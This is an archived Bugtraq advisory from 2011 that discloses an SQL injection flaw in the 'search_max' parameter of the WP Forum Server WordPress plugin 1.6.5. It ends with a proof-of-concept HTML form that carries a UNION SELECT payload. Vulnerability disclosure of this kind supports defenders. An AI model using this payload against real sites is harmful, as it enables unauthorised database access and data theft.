[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: HTB22851: SQL Injection in WP Forum Server wordpress plugin
From: advisory () htbridge ! ch
Date: 2011-02-24 11:33:52
Message-ID: 201102241133.p1OBXqWH022247 () htbridge ! ch
[Download RAW message or body]
Vulnerability ID: HTB22851
Reference: http://www.htbridge.ch/advisory/sql_injection_in_wp_forum_server_wordpress_plugin_1.html
Product: WP Forum Server wordpress plugin
Vendor: VastHTML ( http://lucidcrew.com/ )
Vulnerable Version: 1.6.5
Vendor Notification: 10 February 2011
Vulnerability Type: SQL Injection
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing \
(http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "index.php" script to properly \
sanitize user-supplied input in "search_max" variable. Attacker can alter queries to \
the application SQL database, execute arbitrary queries to the database, compromise \
the application, access or modify sensitive data, or exploit various vulnerabilities \
in the underlying SQL database.
The following PoC is available:
<form action="http://[host]/?page_id=[page_id]&vasthtmlaction=search" method="post" \
name="main" > <input type="hidden" name="search_words" value="123" />
<input type="hidden" name="search_submit" value="Search forums" />
<input type="hidden" name="search_user" value="*" />
<input type="hidden" name="search_min" value="0" />
<input type="hidden" name="search_max" value="9999 DAY) union select version(),2,3,4 \
-- " /> <input type="submit" value="search" name="submit" />
</form>
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic